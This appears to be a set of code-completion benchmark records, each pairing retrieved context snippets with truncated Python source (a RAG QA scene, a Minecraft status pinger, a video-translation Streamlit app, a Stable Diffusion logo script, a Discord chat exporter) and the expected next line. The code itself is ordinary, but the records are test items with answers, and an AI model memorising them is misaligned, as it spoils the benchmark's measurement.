"snippet": "class DatasetConfig(_Config):\n path: str = Field(default=\"explodinggradients/fiqa\")\n split: str = Field(default=\"baseline\")\n question_column: str = Field(default=\"question\")\n golden_answer_column: str = Field(default=\"answer\")\n ground_truth_column: str = Field(default=\"ground_truths\")\n num_questions: int = Field(default=-1)\n filter_conditions: Optional[List[DynamicFn]] = Field(default=None)\n question_preprocessor: Optional[DynamicFn] = Field(default=None)\n name: Optional[str] = Field(default=None)\n data_dir: Optional[str] = Field(default=None)\n data_files: Optional[List[str]] = Field(default=None)\n\n def model_post_init(self, __context: Any) -> None:\n if self.num_questions < -1 or self.num_questions == 0:\n raise ValueError(f\"num_questions should be -1 or positive, got {self.num_questions}\")"
},
{
"identifier": "ExamineeAnswer",
"path": "rag_qa/rag_qa/scene_definition.py",
"snippet": "def avg_fn(records: List[_RecordData]) -> AggregationMethodOutput:\nclass ExaminerQuestion(TextMessage):\nclass ExamineeAnswer(JsonMessage):\nSCENE_DEFINITION = SceneDefinition(\n name=\"RAG QA Examine\",\n description=\"Retrieval Augmented Generation Question Answering Examine Scene. The evaluator powered by ragas.\",\n roles=[\n RoleDefinition(\n name=\"examiner\",\n description=\"the one that participants in a rag based qa examine to monitor the examinees\",\n num_agents_range=(1, 1),\n is_static=True,\n actions=[]\n ),\n RoleDefinition(\n name=\"examinee\",\n description=\"the one that participants in a rag based qa examine to answer questions\",\n num_agents_range=(1, -1),\n is_static=False,\n actions=[\n ActionDefinition(\n name=\"answer_question\",\n description=\"answering the question sent by examiner\",\n signature=ActionSignatureDefinition(\n parameters=[\n ActionSignatureParameterDefinition(\n name=\"question\",\n annotation=ExaminerQuestion\n ),\n ActionSignatureParameterDefinition(\n name=\"examiner\",\n annotation=Profile\n )\n ],\n return_annotation=ExamineeAnswer,\n is_static_method=False\n ),\n metrics=MetricDefinitionList,\n )\n ]\n )\n ],\n env_vars=[]\n)"
}
] | import asyncio
from typing import List, Optional
from pydantic import Field
from leaf_playground.core.workers import Logger
from leaf_playground.core.scene import Scene
from leaf_playground.core.scene_definition import SceneConfig
from leaf_playground.data.log_body import ActionLogBody
from leaf_playground.data.media import Text, Json
from .agents.examiner import Examiner
from .agents.base_examinee import AIBaseExaminee
from .dataset_utils import DatasetConfig
from .scene_definition import ExamineeAnswer, ExaminerQuestion, MessageType, SCENE_DEFINITION | 1,386 |
class RagSceneLogBody(ActionLogBody):
references: Optional[List[MessageType]] = Field(default=None)
response: MessageType = Field(default=...)
ground_truth: Optional[Json] = Field(default=None)
RagSceneConfig = SceneConfig.create_config_model(
SCENE_DEFINITION,
additional_config_fields={"dataset_config": (DatasetConfig, Field(default=...))}
)
class RagScene(Scene, scene_definition=SCENE_DEFINITION, log_body_class=RagSceneLogBody):
config_cls = RagSceneConfig
config: config_cls
def __init__(self, config: config_cls, logger: Logger):
super().__init__(config=config, logger=logger)
self.examiner: Examiner = self.static_agents["examiner"][0]
self.examinees: List[AIBaseExaminee] = self.agents["examinee"]
async def _run(self):
async def examinee_answer(examinee: AIBaseExaminee, q: ExaminerQuestion) -> None:
try:
|
class RagSceneLogBody(ActionLogBody):
references: Optional[List[MessageType]] = Field(default=None)
response: MessageType = Field(default=...)
ground_truth: Optional[Json] = Field(default=None)
RagSceneConfig = SceneConfig.create_config_model(
SCENE_DEFINITION,
additional_config_fields={"dataset_config": (DatasetConfig, Field(default=...))}
)
class RagScene(Scene, scene_definition=SCENE_DEFINITION, log_body_class=RagSceneLogBody):
config_cls = RagSceneConfig
config: config_cls
def __init__(self, config: config_cls, logger: Logger):
super().__init__(config=config, logger=logger)
self.examiner: Examiner = self.static_agents["examiner"][0]
self.examinees: List[AIBaseExaminee] = self.agents["examinee"]
async def _run(self):
async def examinee_answer(examinee: AIBaseExaminee, q: ExaminerQuestion) -> None:
try: | answer: ExamineeAnswer = await examinee.answer_question(question=q, examiner=self.examiner.profile) | 3 | 2023-12-21 03:09:08+00:00 | 2k |
djkcyl/ABot-NT | func/tool/mcping/mcping.py | [
{
"identifier": "SelfPicture",
"path": "utils/message/picture.py",
"snippet": "class SelfPicture:\n def __init__(self) -> None:\n self.s3file = Launart.current().get_component(S3FileService).s3file\n\n async def from_name(self, name: str) -> Picture:\n url = await self.s3file.get_presigned_url(name)\n return Picture(UrlResource(url))\n\n async def from_data(self, data: bytes | BytesIO, image_format: str | None = None) -> Picture:\n # 如果没有指定格式, 那么就尝试从 data 中获取\n if not image_format:\n if isinstance(data, BytesIO):\n image = Image.open(data)\n data.seek(0)\n else:\n image = Image.open(BytesIO(data))\n if image.format:\n image_format = image.format.lower()\n else:\n msg = \"无法获取图片格式\"\n raise ValueError(msg)\n\n # 防止后续操作 data 时出现问题, 先将 data 转换为 bytes\n if isinstance(data, BytesIO):\n data = data.getvalue()\n name = f\"{token_hex(32)}.{image_format}\"\n\n # 根据场景选择上传方式\n ctx = Context.current\n if ctx.scene.path_without_land == \"group\":\n await self.s3file.put_object(name, data, f\"image/{image_format}\", \"temp_image\")\n return await self.from_name(name)\n if ctx.scene.path_without_land in {\"guild.channel\", \"guild.user\"}:\n return Picture(RawResource(data))\n msg = \"不支持的平台\"\n raise NotImplementedError(msg)"
},
{
"identifier": "StatusPing",
"path": "func/tool/mcping/statusping.py",
"snippet": "class StatusPing:\r\n def __init__(self, host: str = \"localhost\", port: int = 25565, timeout: int = 5):\r\n self._host = host\r\n self._port = port\r\n self._timeout = timeout\r\n\r\n @staticmethod\r\n def _unpack_varint(sock: socket.socket) -> int:\r\n data = 0\r\n for i in range(5):\r\n ordinal = sock.recv(1)\r\n if len(ordinal) == 0:\r\n break\r\n\r\n byte = ord(ordinal)\r\n data |= (byte & 0x7F) << 7 * i\r\n\r\n if not byte & 0x80:\r\n break\r\n\r\n return data\r\n\r\n @staticmethod\r\n def _pack_varint(data: int) -> bytes:\r\n ordinal = b\"\"\r\n\r\n while True:\r\n byte = data & 0x7F\r\n data >>= 7\r\n ordinal += struct.pack(\"B\", byte | (0x80 if data > 0 else 0))\r\n\r\n if data == 0:\r\n break\r\n\r\n return ordinal\r\n\r\n def _pack_data(self, data: str | int | float | bytes) -> bytes: # noqa: PYI041\r\n if isinstance(data, str):\r\n data = data.encode(\"utf8\")\r\n return self._pack_varint(len(data)) + data\r\n if isinstance(data, int):\r\n return struct.pack(\"H\", data)\r\n if isinstance(data, float):\r\n return struct.pack(\"Q\", int(data))\r\n return data\r\n\r\n def _send_data(self, connection: socket.socket, *args: str | int | float | bytes) -> None: # noqa: PYI041\r\n data = b\"\"\r\n\r\n for arg in args:\r\n data += self._pack_data(arg)\r\n\r\n connection.send(self._pack_varint(len(data)) + data)\r\n\r\n def _read_fully(self, connection: socket.socket, *, extra_varint: bool = False) -> bytes:\r\n packet_length = self._unpack_varint(connection)\r\n packet_id = self._unpack_varint(connection)\r\n byte = b\"\"\r\n\r\n if extra_varint:\r\n if packet_id > packet_length:\r\n self._unpack_varint(connection)\r\n\r\n extra_length = self._unpack_varint(connection)\r\n\r\n while len(byte) < extra_length:\r\n byte += connection.recv(extra_length)\r\n\r\n else:\r\n byte = connection.recv(packet_length)\r\n\r\n return byte\r\n\r\n def get_status(self) -> dict:\r\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as connection:\r\n connection.settimeout(self._timeout)\r\n connection.connect((self._host, self._port))\r\n self._send_data(connection, b\"\\x00\\x00\", self._host, self._port, b\"\\x01\")\r\n self._send_data(connection, b\"\\x00\")\r\n\r\n data = self._read_fully(connection, extra_varint=True)\r\n\r\n self._send_data(connection, b\"\\x01\", time.time() * 1000)\r\n unix = self._read_fully(connection)\r\n\r\n response: dict = json.loads(data.decode(\"utf8\"))\r\n response[\"ping\"] = int(time.time() * 1000) - struct.unpack(\"Q\", unix)[0]\r\n\r\n return response\r"
}
] | import asyncio
import base64
import contextlib
import json
import re
import dns.resolver
from io import BytesIO
from avilla.core import Picture
from loguru import logger
from PIL import Image
from utils.message.picture import SelfPicture
from .statusping import StatusPing
| 1,539 |
def ping_status(host: str, port: int | None = None) -> dict:
if port is None:
with contextlib.suppress(Exception):
srv_records = dns.resolver.query(f"_minecraft._tcp.{host}", "SRV")
for srv in srv_records:
host = str(srv.target).rstrip(".")
port = srv.port
break
status_ping = StatusPing(host, port or 25565)
status = status_ping.get_status()
status_str = json.dumps(status)
status_str = re.sub(r"\\u00a7.", "", status_str)
status: dict = json.loads(status_str)
logger.debug(status)
return status
def get_server_status(say: str) -> dict:
host, _, port = say.partition(":")
return ping_status(host, int(port) if port else None)
async def handle_favicon(status: dict, messages: list[str | Picture]) -> None:
if favicon := status.get("favicon"):
byte_data = base64.b64decode(f"{favicon[22:-1]}=")
img = Image.open(BytesIO(byte_data)).convert("RGB")
image = BytesIO()
img.save(image, format="JPEG", quality=90)
|
def ping_status(host: str, port: int | None = None) -> dict:
if port is None:
with contextlib.suppress(Exception):
srv_records = dns.resolver.query(f"_minecraft._tcp.{host}", "SRV")
for srv in srv_records:
host = str(srv.target).rstrip(".")
port = srv.port
break
status_ping = StatusPing(host, port or 25565)
status = status_ping.get_status()
status_str = json.dumps(status)
status_str = re.sub(r"\\u00a7.", "", status_str)
status: dict = json.loads(status_str)
logger.debug(status)
return status
def get_server_status(say: str) -> dict:
host, _, port = say.partition(":")
return ping_status(host, int(port) if port else None)
async def handle_favicon(status: dict, messages: list[str | Picture]) -> None:
if favicon := status.get("favicon"):
byte_data = base64.b64decode(f"{favicon[22:-1]}=")
img = Image.open(BytesIO(byte_data)).convert("RGB")
image = BytesIO()
img.save(image, format="JPEG", quality=90)
| messages.append(await SelfPicture().from_data(image, "jpeg"))
| 0 | 2023-12-16 13:19:56+00:00 | 2k |
Chenyme/Chenyme-AAMT | AAMT.py | [
{
"identifier": "generate_srt_from_result",
"path": "utils/utils.py",
"snippet": "def generate_srt_from_result(result): # 格式化为SRT字幕的形式\r\n segments = result['segments']\r\n srt_content = ''\r\n segment_id = 1\r\n for segment in segments:\r\n start_time = int(segment['start'] * 1000)\r\n end_time = int(segment['end'] * 1000)\r\n text = segment['text']\r\n\r\n srt_content += f\"{segment_id}\\n\"\r\n srt_content += f\"{milliseconds_to_srt_time_format(start_time)} --> {milliseconds_to_srt_time_format(end_time)}\\n\"\r\n srt_content += f\"{text}\\n\\n\"\r\n segment_id += 1\r\n\r\n return srt_content\r"
},
{
"identifier": "tmp_filepath",
"path": "utils/utils.py",
"snippet": "def tmp_filepath(uploaded_file): # 虚拟化文件路径\r\n with tempfile.NamedTemporaryFile(delete=False) as tmp_file:\r\n tmp_file.write(uploaded_file.getvalue())\r\n return tmp_file.name\r"
},
{
"identifier": "openai_translate",
"path": "utils/utils.py",
"snippet": "def openai_translate(key, base, result):\r\n llm = ChatOpenAI(openai_api_key=key, openai_api_base=base)\r\n # Prompt\r\n prompt = ChatPromptTemplate(\r\n messages=[\r\n SystemMessagePromptTemplate.from_template(\r\n \"You are a senior translator proficient in Chinese and English. Your task is to translate whatever the user says. You only need to answer the translation result and do not use punctuation marks other than question marks. Please strictly implement it!\"\r\n ),\r\n # The `variable_name` here is what must align with memory\r\n MessagesPlaceholder(variable_name=\"chat_history\"),\r\n HumanMessagePromptTemplate.from_template(\"{question}\"),\r\n ]\r\n )\r\n # 设置记忆参数\r\n memory = ConversationBufferWindowMemory(memory_key=\"chat_history\", return_messages=True, k=5)\r\n conversation = LLMChain(llm=llm, prompt=prompt, verbose=False, memory=memory)\r\n segments = result['segments']\r\n segment_id = 0\r\n for segment in segments:\r\n text = segment['text']\r\n response = conversation({\"question\": text})\r\n result['segments'][segment_id]['text'] = response['text']\r\n segment_id += 1\r\n return result\r"
},
{
"identifier": "srt_mv",
"path": "utils/utils.py",
"snippet": "def srt_mv(cache_dir):\r\n command = ' ffmpeg -i \"' + \"uploaded.mp4\" + '\" -lavfi ' + '\"subtitles=' + 'output.srt' + ':force_style=' + \"'BorderStyle=0,Outline=1,Shadow=0,Fontsize=18'\" + '\"' + ' -y -crf 1 -c:a copy \"' + \"output.mp4\" + '\"'\r\n subprocess.run(command, shell=True, cwd=cache_dir)\r"
},
{
"identifier": "cache",
"path": "utils/utils.py",
"snippet": "def cache(cache_dir):\r\n total_size = 0 # 总大小,初始为0\r\n for root, dirs, files in os.walk(cache_dir): # 遍历文件夹中的所有文件和子文件夹\r\n for file_name in files:\r\n file_path = os.path.join(root, file_name)\r\n total_size += os.path.getsize(file_path)\r\n return total_size\r"
},
{
"identifier": "convert_size",
"path": "utils/utils.py",
"snippet": "def convert_size(size):\r\n if size == 0:\r\n return \"0B\"\r\n size_names = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n i = int(math.floor(math.log(size, 1024)))\r\n power = math.pow(1024, i)\r\n size = round(size / power, 2)\r\n return f\"{size} {size_names[i]}\"\r"
}
] | import os
import json
import streamlit as st
import whisper
from utils.utils import generate_srt_from_result, tmp_filepath, openai_translate, srt_mv, cache, convert_size
| 1,557 | # 作者:chenyme
# Version: v0.2.2
# Blog site: to be updated
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
    layout="wide", # Set the layout style to wide
    initial_sidebar_state="expanded" # Set the initial sidebar state to expanded
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # Read the config
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
    # File upload logic
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
                # Whisper speech recognition
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # whisper源语言识别内容
| # 作者:chenyme
# Version: v0.2.2
# Blog site: to be updated
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
    layout="wide", # Set the layout style to wide
    initial_sidebar_state="expanded" # Set the initial sidebar state to expanded
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # Read the config
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
    # File upload logic
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
                # Whisper speech recognition
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # whisper源语言识别内容
| result = openai_translate(st.session_state.key, st.session_state.base, result) # 翻译成目标语言
| 2 | 2023-12-18 04:06:03+00:00 | 2k |
davidrs/logo-buddy | logo_buddy/main.py | [
{
"identifier": "preprocess",
"path": "logo_buddy/controlnet.py",
"snippet": "def preprocess(image, controlnet_path=None):\n if \"canny\" in controlnet_path:\n return canny_preprocess(image)\n else:\n return Image.fromarray(image)"
},
{
"identifier": "CN_MODELS",
"path": "logo_buddy/controlnet.py",
"snippet": "CN_MODELS = {\n \"qr\": \"/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/controlnetQRPatternQR_v2Sd15.safetensors\",\n \"canny\": \"/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/control_canny-fp16.safetensors\",\n \"depth\": \"/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/control_depth-fp16.safetensors\",\n}"
},
{
"identifier": "read_fit",
"path": "logo_buddy/utils.py",
"snippet": "def read_fit(img_path, max_width=768):\n image = cv2.imread(img_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # resize image to X width, keep ratio\n h, w, _ = image.shape\n new_w = max_width\n new_h = int(h * (new_w / w))\n image = cv2.resize(image, (new_w, new_h))\n return image"
}
] | import os
import os.path as op
import numpy as np
import torch
import cv2
import torch
from glob import glob
from diffusers import StableDiffusionPipeline, DiffusionPipeline
from diffusers import (
StableDiffusionControlNetPipeline,
ControlNetModel,
UniPCMultistepScheduler,
)
from diffusers.utils import load_image
from PIL import Image
from .controlnet import preprocess, CN_MODELS
from .utils import read_fit | 1,465 |
STEPS = 34
SEED = 12
MODELS = {
"real": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/realisticVisionV51_v51VAE.safetensors",
"anim": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/revAnimated_v122EOL.safetensors",
}
#
PROMPT_LIST = [
# Winter
{"text": "santa playing in the snow, ethereal, dreamy, highly detailed, realistic lighting, sharp focus, rule of thirds, artgerm, wlop, arney freytag, hd, octane, 4 k, ", "file_name": "winter_santa", "model":"anim"}, # <lora:fantasy00d:0.5>, animated
{
"text": "ethereal fantasy concept art of dreamscape Winter wonderland, surreal, ethereal, dreamy, mysterious, fantasy, highly detailed, magnificent, celestial, ethereal, painterly, epic, majestic, magical, fantasy art, cover art, dreamy",
"file_name": "winter_wonderland",
"model": "anim",
},
{"text": "((ginger bread house)), realistic, insanely detailed, octane rendered, unreal engine, illustration, trending on artstation, masterpiece, photography", "file_name": "winter_ginger", "model":"real"},
{"text": "winter ice sculpture ", "file_name": "winter_ice"},
# General
{"text": "a neon glowing sign", "file_name": "neon"},
{"text": "hot air balloons ", "file_name": "hot_air_balloons", "model":"real"},
{"text": "(wood carving), (inlay), (etsy) ", "file_name": "wood_carving", "model":"real"},
{
"text": "paper cut, paper layers, laser cut, paper art, vibrant colors, ",
"file_name": "paper_art",
"model": "real",
},
# {"text": "carved halloween pumpkin, witches, spooky, fun, (vibrant colors:1.1), ", "file_name": "haloween", "model":"anim"}, # <lora:fantasy00d:0.5>, animated
{
"text": "fun textures and colours , logo, pixar, orange and pink clouds blue sky, sun, happy vibes, subtle lense flare, birds ",
"file_name": "clouds",
"model": "anim",
},
]
DEFAULT_POSITIVE_SUFFIX = (
",detailed, intricate, best quality, (highest quality, award winning:1.3)"
)
DEFAULT_NEGATIVE_PROMPT = (
"blurry, low quality, low resolution, low res, low resolution, watermark, logo"
)
OUT_DIR = "./out"
os.makedirs(OUT_DIR, exist_ok=True)
# env is mac, cpu or gpu
DEVICE = "mps"
if torch.cuda.is_available():
DEVICE = "gpu"
def get_pipe(model_path, controlnet_path=None):
controlnet_model = None
if controlnet_path:
# load control net and stable diffusion v1-5
controlnet_model = ControlNetModel.from_single_file(
controlnet_path,
torch_dtype=torch.float16,
use_safetensors=True,
device=DEVICE,
)
pipe = StableDiffusionControlNetPipeline.from_single_file(
model_path,
use_safetensors=True,
torch_dtype=torch.float16,
controlnet=controlnet_model,
)
pipe = pipe.to(DEVICE)
# Recommended if your computer has < 64 GB of RAM
pipe.enable_attention_slicing()
return pipe
def controlnet_generate(img_path, pipe, out_dir, prompts=PROMPT_LIST, controlnet=None):
image = read_fit(img_path)
preprocessed_image = None
if controlnet:
preprocessed_image = preprocess(image, controlnet_path=controlnet)
for p in prompts:
generator = torch.manual_seed(SEED)
for i in range(0, 1):
print(DEFAULT_POSITIVE_SUFFIX)
print(p["text"])
steps = STEPS
image = pipe(
p["text"] + DEFAULT_POSITIVE_SUFFIX,
negative_prompt=DEFAULT_NEGATIVE_PROMPT,
num_inference_steps=steps,
generator=generator,
image=preprocessed_image,
# guidance_scale=20 if 'qr' in controlnet else 15,
# controlnet_conditioning_scale=2.0 if 'qr' in controlnet else 1.0,
# strength=0.85,
).images[0]
image.save(op.join(out_dir, f"{p['file_name']}_{controlnet}_{SEED}.png"))
# if main
if __name__ == "__main__":
for m, mp in MODELS.items():
|
STEPS = 34
SEED = 12
MODELS = {
"real": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/realisticVisionV51_v51VAE.safetensors",
"anim": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/revAnimated_v122EOL.safetensors",
}
#
PROMPT_LIST = [
# Winter
{"text": "santa playing in the snow, ethereal, dreamy, highly detailed, realistic lighting, sharp focus, rule of thirds, artgerm, wlop, arney freytag, hd, octane, 4 k, ", "file_name": "winter_santa", "model":"anim"}, # <lora:fantasy00d:0.5>, animated
{
"text": "ethereal fantasy concept art of dreamscape Winter wonderland, surreal, ethereal, dreamy, mysterious, fantasy, highly detailed, magnificent, celestial, ethereal, painterly, epic, majestic, magical, fantasy art, cover art, dreamy",
"file_name": "winter_wonderland",
"model": "anim",
},
{"text": "((ginger bread house)), realistic, insanely detailed, octane rendered, unreal engine, illustration, trending on artstation, masterpiece, photography", "file_name": "winter_ginger", "model":"real"},
{"text": "winter ice sculpture ", "file_name": "winter_ice"},
# General
{"text": "a neon glowing sign", "file_name": "neon"},
{"text": "hot air balloons ", "file_name": "hot_air_balloons", "model":"real"},
{"text": "(wood carving), (inlay), (etsy) ", "file_name": "wood_carving", "model":"real"},
{
"text": "paper cut, paper layers, laser cut, paper art, vibrant colors, ",
"file_name": "paper_art",
"model": "real",
},
# {"text": "carved halloween pumpkin, witches, spooky, fun, (vibrant colors:1.1), ", "file_name": "haloween", "model":"anim"}, # <lora:fantasy00d:0.5>, animated
{
"text": "fun textures and colours , logo, pixar, orange and pink clouds blue sky, sun, happy vibes, subtle lense flare, birds ",
"file_name": "clouds",
"model": "anim",
},
]
DEFAULT_POSITIVE_SUFFIX = (
",detailed, intricate, best quality, (highest quality, award winning:1.3)"
)
DEFAULT_NEGATIVE_PROMPT = (
"blurry, low quality, low resolution, low res, low resolution, watermark, logo"
)
OUT_DIR = "./out"
os.makedirs(OUT_DIR, exist_ok=True)
# env is mac, cpu or gpu
DEVICE = "mps"
if torch.cuda.is_available():
DEVICE = "gpu"
def get_pipe(model_path, controlnet_path=None):
controlnet_model = None
if controlnet_path:
# load control net and stable diffusion v1-5
controlnet_model = ControlNetModel.from_single_file(
controlnet_path,
torch_dtype=torch.float16,
use_safetensors=True,
device=DEVICE,
)
pipe = StableDiffusionControlNetPipeline.from_single_file(
model_path,
use_safetensors=True,
torch_dtype=torch.float16,
controlnet=controlnet_model,
)
pipe = pipe.to(DEVICE)
# Recommended if your computer has < 64 GB of RAM
pipe.enable_attention_slicing()
return pipe
def controlnet_generate(img_path, pipe, out_dir, prompts=PROMPT_LIST, controlnet=None):
image = read_fit(img_path)
preprocessed_image = None
if controlnet:
preprocessed_image = preprocess(image, controlnet_path=controlnet)
for p in prompts:
generator = torch.manual_seed(SEED)
for i in range(0, 1):
print(DEFAULT_POSITIVE_SUFFIX)
print(p["text"])
steps = STEPS
image = pipe(
p["text"] + DEFAULT_POSITIVE_SUFFIX,
negative_prompt=DEFAULT_NEGATIVE_PROMPT,
num_inference_steps=steps,
generator=generator,
image=preprocessed_image,
# guidance_scale=20 if 'qr' in controlnet else 15,
# controlnet_conditioning_scale=2.0 if 'qr' in controlnet else 1.0,
# strength=0.85,
).images[0]
image.save(op.join(out_dir, f"{p['file_name']}_{controlnet}_{SEED}.png"))
# if main
if __name__ == "__main__":
for m, mp in MODELS.items(): | for cn, cn_path in CN_MODELS.items(): | 1 | 2023-12-17 19:24:56+00:00 | 2k |
Varexa/Gateway | chat_exporter/construct/assets/embed.py | [
{
"identifier": "discord",
"path": "chat_exporter/ext/discord_import.py",
"snippet": ""
},
{
"identifier": "fill_out",
"path": "chat_exporter/ext/html_generator.py",
"snippet": "PARSE_MODE_NONE = 0\r\nPARSE_MODE_NO_MARKDOWN = 1\r\nPARSE_MODE_MARKDOWN = 2\r\nPARSE_MODE_EMBED = 3\r\nPARSE_MODE_SPECIAL_EMBED = 4\r\nPARSE_MODE_REFERENCE = 5\r\nPARSE_MODE_EMOJI = 6\r\nasync def fill_out(guild, base, replacements):\r\ndef read_file(filename):\r"
}
] | import html
from chat_exporter.ext.discord_import import discord
from chat_exporter.ext.html_generator import (
fill_out,
embed_body,
embed_title,
embed_description,
embed_field,
embed_field_inline,
embed_footer,
embed_footer_icon,
embed_image,
embed_thumbnail,
embed_author,
embed_author_icon,
PARSE_MODE_NONE,
PARSE_MODE_EMBED,
PARSE_MODE_MARKDOWN,
PARSE_MODE_SPECIAL_EMBED,
)
| 894 |
modules_which_use_none = ["nextcord", "disnake"]
def _gather_checker():
if discord.module not in modules_which_use_none and hasattr(discord.Embed, "Empty"):
return discord.Embed.Empty
return None
class Embed:
r: str
g: str
b: str
title: str
description: str
author: str
image: str
thumbnail: str
footer: str
fields: str
check_against = None
def __init__(self, embed, guild):
self.embed: discord.Embed = embed
self.guild: discord.Guild = guild
async def flow(self):
self.check_against = _gather_checker()
self.build_colour()
await self.build_title()
await self.build_description()
await self.build_fields()
await self.build_author()
await self.build_image()
await self.build_thumbnail()
await self.build_footer()
await self.build_embed()
return self.embed
def build_colour(self):
self.r, self.g, self.b = (
(self.embed.colour.r, self.embed.colour.g, self.embed.colour.b)
if self.embed.colour != self.check_against else (0x20, 0x22, 0x25) # default colour
)
async def build_title(self):
self.title = html.escape(self.embed.title) if self.embed.title != self.check_against else ""
if self.title:
self.title = await fill_out(self.guild, embed_title, [
("EMBED_TITLE", self.title, PARSE_MODE_MARKDOWN)
])
async def build_description(self):
self.description = html.escape(self.embed.description) if self.embed.description != self.check_against else ""
if self.description:
self.description = await fill_out(self.guild, embed_description, [
("EMBED_DESC", self.embed.description, PARSE_MODE_EMBED)
])
async def build_fields(self):
self.fields = ""
# This does not have to be here, but Pycord.
if not self.embed.fields:
return
for field in self.embed.fields:
field.name = html.escape(field.name)
field.value = html.escape(field.value)
if field.inline:
self.fields += await fill_out(self.guild, embed_field_inline, [
("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED),
("FIELD_VALUE", field.value, PARSE_MODE_EMBED)
])
else:
self.fields += await fill_out(self.guild, embed_field, [
("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED),
("FIELD_VALUE", field.value, PARSE_MODE_EMBED)])
async def build_author(self):
self.author = html.escape(self.embed.author.name) if self.embed.author.name != self.check_against else ""
self.author = f'<a class="chatlog__embed-author-name-link" href="{self.embed.author.url}">{self.author}</a>' \
if self.embed.author.url != self.check_against \
else self.author
|
modules_which_use_none = ["nextcord", "disnake"]
def _gather_checker():
if discord.module not in modules_which_use_none and hasattr(discord.Embed, "Empty"):
return discord.Embed.Empty
return None
class Embed:
r: str
g: str
b: str
title: str
description: str
author: str
image: str
thumbnail: str
footer: str
fields: str
check_against = None
def __init__(self, embed, guild):
self.embed: discord.Embed = embed
self.guild: discord.Guild = guild
async def flow(self):
self.check_against = _gather_checker()
self.build_colour()
await self.build_title()
await self.build_description()
await self.build_fields()
await self.build_author()
await self.build_image()
await self.build_thumbnail()
await self.build_footer()
await self.build_embed()
return self.embed
def build_colour(self):
self.r, self.g, self.b = (
(self.embed.colour.r, self.embed.colour.g, self.embed.colour.b)
if self.embed.colour != self.check_against else (0x20, 0x22, 0x25) # default colour
)
async def build_title(self):
self.title = html.escape(self.embed.title) if self.embed.title != self.check_against else ""
if self.title:
self.title = await fill_out(self.guild, embed_title, [
("EMBED_TITLE", self.title, PARSE_MODE_MARKDOWN)
])
async def build_description(self):
self.description = html.escape(self.embed.description) if self.embed.description != self.check_against else ""
if self.description:
self.description = await fill_out(self.guild, embed_description, [
("EMBED_DESC", self.embed.description, PARSE_MODE_EMBED)
])
async def build_fields(self):
self.fields = ""
# This does not have to be here, but Pycord.
if not self.embed.fields:
return
for field in self.embed.fields:
field.name = html.escape(field.name)
field.value = html.escape(field.value)
if field.inline:
self.fields += await fill_out(self.guild, embed_field_inline, [
("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED),
("FIELD_VALUE", field.value, PARSE_MODE_EMBED)
])
else:
self.fields += await fill_out(self.guild, embed_field, [
("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED),
("FIELD_VALUE", field.value, PARSE_MODE_EMBED)])
async def build_author(self):
self.author = html.escape(self.embed.author.name) if self.embed.author.name != self.check_against else ""
self.author = f'<a class="chatlog__embed-author-name-link" href="{self.embed.author.url}">{self.author}</a>' \
